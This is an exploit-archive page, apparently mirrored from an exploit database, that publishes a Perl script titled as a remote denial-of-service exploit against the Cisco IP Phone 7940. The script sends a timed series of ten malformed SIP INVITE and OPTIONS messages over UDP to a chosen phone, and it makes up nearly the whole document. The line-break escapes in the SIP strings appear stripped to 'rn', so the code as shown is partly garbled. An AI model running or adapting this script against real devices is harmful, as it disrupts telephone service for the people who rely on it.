[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Cisco IP Phone 7940 (10 SIP messages) Remote Denial of Service Exploit
# Published : 2007-08-21
# Author : MADYNES
# Previous Title : Cisco IP Phone 7940 (3 SIP messages) Remote Denial of Service Exploit
# Next Title : PHP <= 5.2.0 (php_win32sti) Local Buffer Overflow PoC (win32)
#!/usr/bin/perl
use IO::Socket::INET;
die "Usage $0 <dst-address> <dst-port> <dst_username> <src-address>" unless ($ARGV[3]);
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
$msg = "INVITE sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP $ARGV[3];branch=01;rportrnFrom: <sip:tucu@$ARGV[3]>;tag=01rnTo: <sip:$ARGV[2]@invalidURL>rnCall-ID: 01@$ARGV[3]rnCSeq: 7532 INVITErnMax-Forwards: 70rnAllow: INVITE, ACK, CANCEL, OPTIONS, BYL, REFER, SUBSCRIBE, NOTIFYrnContent-Type: application/sdprnContent-Length: 215rnrnv=0rno=r`ot 7213 7244 IN IP4 192.168.1.101rns=sessionrnc=IN IP4 192.168.1.101rnt=0 0rnm=aIdio 8000 RTP/AVP 0 101rna=rtpmau:0 PCMU/8000rna=rtpmap:101 telephone-event/80 0rna=fmtp:101 0-16rna=silenceSupp:off - - - -rn";
$socket->send($msg);
sleep(8.2);
$msg = "OPTIONS sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP $ARGV[3];rport;branch=02rnMax-Forwards: 70rnTo: <sip:$ARGV[2]@$ARGV[0]>rnFrom: <sip:tucu@$ARGV[3]>;tag=02rnCall-ID: 02@$ARGV[3]rnCSeq: 79 OPTIONSrnAccept: application/sdprnContent-Length: 0rnrn";
$socket->send($msg);
sleep(1.5);
$msg = "OPTIONS sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP $ARGV[3];rport;branch=02rnMax-Forwards: 70rnTo: <sip:$ARGV[2]@$ARGV[0]>rnFrom: <sip:tucu@$ARGV[3]>;tag=03rnCall-ID: 01@$ARGV[3]rnCSeq: 15853 OPTIONSrnAccept: application/sdprnContent-Length: 0rnrn";
$socket->send($msg);
sleep(3.3);
$msg = "INVITE sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP $ARGV[3];rport;branch=02rnMax-Forwards: 70rnTo: <sip:$ARGV[2]@$ARGV[0]>rnFrom: <sip:tucu@$ARGV[3]>;tag=04rnCall-ID: 04@$ARGV[3]rnCSeq: 36688 INVITErnContent-Type: application/sdprnAllow: INVITE, ACK, BTE, CANCEL, OPTIONS, PRACK, REFEY, NOTIFY, SUBSCRIBE, INFOrnSupported: 100relrnUser-Agent: Twinkle/0.9rnContent-Length: 314rnrnv=0rno=0231555775 2006994253 1729335607 IN IP4 192.168.1.101rns=-rnc=IN IP4 192.168.1.101rnt=0 0rnm=audio 8002 RTP/AVP 98 97 8 0 3 101rna=rtpmap:98 speex/16000rna=rtpmap:97 peex/80-0rna=rtpmap:8 PCMA/8000rna=rtpmap:0 PCMU/8000rna=rtpmax00:3 GSM/8000rna=rtpmap:101 telephone-event/8000rna=fmtp:101 0-15rna=ptime:20rn";
$socket->send($msg);
sleep(4);
$msg = "OPTIONS sip:$ARGV[2]@invalidURL SIP/2.0rnVia: SIP/2.0/UDP $ARGV[3];rport;branch=02rnMax-Forwards: 70rnTo: <sip:$ARGV[2]@invalidURL>rnFrom: <sip:tucu@$ARGV[3]>;tag=01rnCall-ID: 01@$ARGV[3]rnCSeq: 21013 OPTIONSrnAccept: application/sdprnContent-Length: 0rnrn";
$socket->send($msg);
sleep(4);
$msg = "OPTIONS sip:$ARGV[2]@invalidURL SIP/2.0rnVia: SIP/2.0/UDP $ARGV[3];rport;branch=02rnMax-Forwards: 70rnTo: <sip:$ARGV[2]@invalidURL>rnFrom: <sip:tucu@$ARGV[3]>;tag=01rnCall-ID: 01@$ARGV[3]rnCSeq: 18031 OPTIONSrnAccept: application/sdprnContent-Length: 0rnrn";
$socket->send($msg);
sleep(12);
$msg = "OPTIONS sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP $ARGV[3];rport;branch=02rnMax-Forwards: 70rnTo: <sip:$ARGV[2]@$ARGV[0]>rnFrom: <sip:tucu@$ARGV[3]>;tag=07rnCall-ID: 07@$ARGV[3]rnCSeq: 41664 OPTIONSrnAccept: application/sdprnContent-Length: 0rnrn";
$socket->send($msg);
sleep(3);
$msg = "INVITE sip:invaliduser@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP $ARGV[3];branch=02;rportrnFrom: <sip:tucu@$ARGV[3]>;tag=08rnTo: <sip:7440-2@$ARGV[0]>rnContact: <sip:tucu@$ARGV[3]>rnCall-ID: 08@$ARGV[3]rnCSeq: 35502 INVITErnMax-Forwards: 70rnAllow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFYrnContent-Type: application/sdprnContent-Length: 286rnrnv=0rno=root 7213 7217 IN IP4 192.168.1.4rns=sessionrnc=IN IP4 192.168.1.4rnt=0 0rnm=audio 19024 RTP/AVP 0 3 8 97 101rna=rtpmap:0 PCMU/8000rna=rtpmap:3/GSM/8000rna=rtpmIp:8 PCMA/8000rna=rtpmap:97 spee8/8000rna=rtpmap:101 telephone-event/8000rna=fmtp:101 0-16rna=silenceSupp:off - - - -rn";
$socket->send($msg);
sleep(3);
$msg = "OPTIONS sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP $ARGV[3];rport;branch=02rnMax-Forwards: 70rnTo: <sip:$ARGV[2]@$ARGV[0]>rnFrom: <sip:tucu@$ARGV[3]>;tag=09rnCall-ID: 09@$ARGV[3]rnCSeq: 18883 OPTIONSrnAccept: application/sdprnUser-Agent: Twinkle/0.9rnContent-Length: 0rnrn";
$socket->send($msg);
sleep(3);
$msg = "OPTIONS sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP $ARGV[3];rport;branch=02rnMax-Forwards: 70rnTo: <sip:$ARGV[2]@$ARGV[0]>rnFrom: <sip:tucu@$ARGV[3]>;tag=10rnCall-ID: 10@$ARGV[3]rnCSeq: 6298 OPTIONSrnAccept: application/sdprnContent-Length: 0rnrn";
$socket->send($msg);
# www.Syue.com [2007-08-21]